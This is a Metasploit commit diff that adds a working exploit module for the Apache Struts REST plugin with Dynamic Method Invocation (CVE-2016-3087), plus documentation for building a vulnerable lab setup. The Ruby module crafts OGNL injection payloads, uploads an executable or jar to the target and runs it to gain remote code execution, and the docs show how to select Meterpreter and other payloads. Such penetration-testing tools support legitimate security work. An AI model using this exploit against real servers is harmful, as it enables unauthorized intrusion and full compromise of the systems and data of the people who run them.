Land rapid7#6945, Add struts_dmi_rest_exec exploit

wchen-r7 · wchen-r7 · commit 7cdadca79bab · 2016-06-08T23:16:46.000-05:00
diff --git a/documentation/modules/exploit/multi/http/struts_dmi_exec.md b/documentation/modules/exploit/multi/http/struts_dmi_exec.md
@@ -15,8 +15,8 @@ For testing purposes, here is how you would set up the vulnerable machine:
 4. Install Java first. Make sure you have the JAVA_HOME environment variable.
 5. Extract Apache Tomcat.
 6. In conf directory of Apache Tomcat, open the tomcat-users.xml file with a text editor.
-7. In tomcat-users.xml, add this role: ```<role rolename="manager-gui"/>```
-8. In tomcat-users.xml, add this role to user tomcat: ```<user username="tomcat" password="tomcat" roles="tomcat,manager-gui"/>```
+7. In tomcat-users.xml, add the ```manager-gui``` role
+8. In tomcat-users.xml, add the ```manager-gui``` role to a user.
 9. Remove other users.
 10. In a terminal or command prompt, ```cd``` to the bin directory, and run: ```catalina.bat run``` (or catalina.sh). You should have Apache Tomcat running on port 8080.
 11. Extract the vulnerable struts app: ```tar -xf struts2-blank.tar.gz```
diff --git a/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md b/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md
@@ -0,0 +1,56 @@
+struts_dmi_rest_exec is a module that exploits Apache Struts's REST plugin with Dynamic Method
+Invocation, and it supports Windows and Linux platforms.
+
+## Vulnerable Application
+
+Apache Struts versions between 2.3.20 and 2.3.28 are vulnerable, except 2.3.20.2 and 2.3.24.2.
+The application's struts.xml also needs set ```struts.enable.DynamicMethodInvocation``` to true,
+and ```struts.devMode``` to false.
+
+For testing purposes, here is how you would set up the vulnerable machine:
+
+1. Download Apache Tomcat
+2. Download Java. [Choose an appropriate version](http://tomcat.apache.org/whichversion.html) based on the Apache Tomcat version you downloaded.
+3. Download the vulnerable [Apache Struts application](https://github.com/rapid7/metasploit-framework/files/300762/struts2-rest-showcase.tar.gz).
+4. Install Java first. Make sure you have the JAVA_HOME environment variable.
+5. Extract Apache Tomcat.
+6. In conf directory of Apache Tomcat, open the tomcat-users.xml file with a text editor.
+7. In tomcat-users.xml, add the ```manager-gui``` role.
+8. In tomcat-users.xml, add the ```manager-gui``` role to a user.
+9. Remove other users.
+10. In a terminal or command prompt, ```cd``` to the bin directory, and run: ```catalina.bat run``` (or catalina.sh). You should have Apache Tomcat running on port 8080.
+11. Extract the vulnerable struts app: ```tar -xf struts2-rest-showcase.tar.gz```
+12. Navigate to the Apache Tomcat server with a browser on port 8080.
+13. Click on Manager App
+14. In the WAR file to deploy section, deploy struts2-rest-showcase.war
+15. Stop struts2-blank in the manager app.
+16. On the server, ```cd``` to ```apache-tomcat-[version]/webapps/struts2-rest-showcase/WEB-INF/classes```, open struts.xml with a text editor.
+17. In the XML file, make sure ```struts.enable.DynamicMethodInvocation``` is true
+18. In the XML file, make sure ```struts.devMode``` is false.
+19. Back to Apache Tomcat's manager app. Start the struts2-rest-showcase again.
+
+And now you have a vulnerable server.
+
+
+## Options
+
+**TMPPATH**
+
+By default, the struts_dmi_rest_exec exploit should be ready to go without much configuration. However,
+in case you need to change where the payload should be uploaded to, make sure to set the correct
+target, and then change the TMPPATH datastore option.
+
+## Scenarios
+
+struts_dmi_rest_exec supports three platforms: Windows, Linux, and Java. By default, it uses Java,
+so you don't need to worry about configuring this. Running the module can be as simple as the usage
+explained in the Overview section.
+
+However, native payload do have their benefits (for example: Windows Meterpreter has better
+support than Java), so if you decide to switch to a different platform, here is what you do:
+
+1. Do ```show targets```, and see which one you should be using
+2. Do ```set target [id]```
+3. Do ```show payloads```, which shows you a list of compatible payloads for that target.
+4. Do: ```set payload [payload name]```
+5. Do: ```exploit```
diff --git a/modules/exploits/multi/http/struts_dmi_rest_exec.rb b/modules/exploits/multi/http/struts_dmi_rest_exec.rb
@@ -0,0 +1,204 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution vulnerability in Apache Struts
+        version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
+        Execution can be performed when using REST Plugin with ! operator when
+        Dynamic Method Invocation is enabled.
+      },
+      'Author'         => [
+        'Nixawk' # original metasploit module
+       ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2016-3087' ],
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91741' ]
+        ],
+      'Platform'      => %w{ java linux win },
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Windows Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ],
+          ['Linux Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            }
+          ],
+          [ 'Java Universal',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'java'
+            },
+          ]
+        ],
+      'DisclosureDate' => 'Jun 01 2016',
+      'DefaultTarget' => 2))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-rest-showcase/orders/3/']),
+        OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
+      ], self.class)
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def get_target_platform
+    target.platform.platforms.first
+  end
+
+  def temp_path
+    @TMPPATH ||= lambda {
+      path = datastore['TMPPATH']
+      return nil unless path
+
+      case get_target_platform
+      when Msf::Module::Platform::Windows
+        slash = '\\'
+      when
+        slash = '/'
+      else
+      end
+
+      unless path.end_with?('/')
+        path << '/'
+      end
+      return path
+    }.call
+  end
+
+  def send_http_request(payload, params_hash)
+    uri = normalize_uri(datastore['TARGETURI'])
+    uri = "#{uri}/#{payload}"
+    resp = send_request_cgi(
+      'uri'     => uri,
+      'version' => '1.1',
+      'method'  => 'POST',
+      'vars_post' => params_hash
+    )
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    end
+    resp
+  end
+
+  def generate_rce_payload(code)
+    payload = ""
+    payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
+    payload << ","
+    payload << Rex::Text.uri_encode(code)
+    payload << ","
+    payload << Rex::Text.uri_encode("#xx.toString.json")
+    payload << "?"
+    payload << Rex::Text.uri_encode("#xx:#request.toString")
+    payload
+  end
+
+  def upload_exec(cmd, filename, content)
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+    var_c = rand_text_alpha_lower(4)
+    var_d = rand_text_alpha_lower(4)
+    var_e = rand_text_alpha_lower(4)
+    var_f = rand_text_alpha_lower(4)
+
+    code =  "##{var_a}=new sun.misc.BASE64Decoder(),"
+    code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),"
+    code << "##{var_b}.write(new java.math.BigInteger(#parameters.#{var_f}[0], 16).toByteArray()),##{var_b}.close(),"
+    code << "##{var_c}=new java.io.File(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),##{var_c}.setExecutable(true),"
+    code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])))"
+    payload = generate_rce_payload(code)
+
+    params_hash = {
+      var_d => Rex::Text.encode_base64(cmd),
+      var_e => Rex::Text.encode_base64(filename),
+      var_f => content
+    }
+    send_http_request(payload, params_hash)
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+
+    addend_one = rand_text_numeric(rand(3) + 1).to_i
+    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    sum = addend_one + addend_two
+    flag = Rex::Text.rand_text_alpha(5)
+
+    code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.close()"
+
+    payload = generate_rce_payload(code)
+    params_hash = { var_b => flag }
+
+    begin
+      resp = send_http_request(payload, params_hash)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
+    case target['Platform']
+      when 'java'
+        payload_exe = "#{temp_path}#{payload_exe}.jar"
+        pl_exe = payload.encoded_jar.pack
+        command = "java -jar #{payload_exe}"
+      when 'linux'
+        path = datastore['TMPPATH'] || '/tmp/'
+        pl_exe = generate_payload_exe
+        payload_exe = "#{path}#{payload_exe}"
+        command = "/bin/sh -c #{payload_exe}"
+      when 'win'
+        path = temp_path || '.\\'
+        pl_exe = generate_payload_exe
+        payload_exe = "#{path}#{payload_exe}.exe"
+        command = "cmd.exe /c #{payload_exe}"
+      else
+        fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    end
+
+    pl_content = pl_exe.unpack('H*').join()
+
+    print_status("Uploading exploit to #{payload_exe}, and executing it.")
+    upload_exec(command, payload_exe, pl_content)
+
+    handler
+  end
+
+end
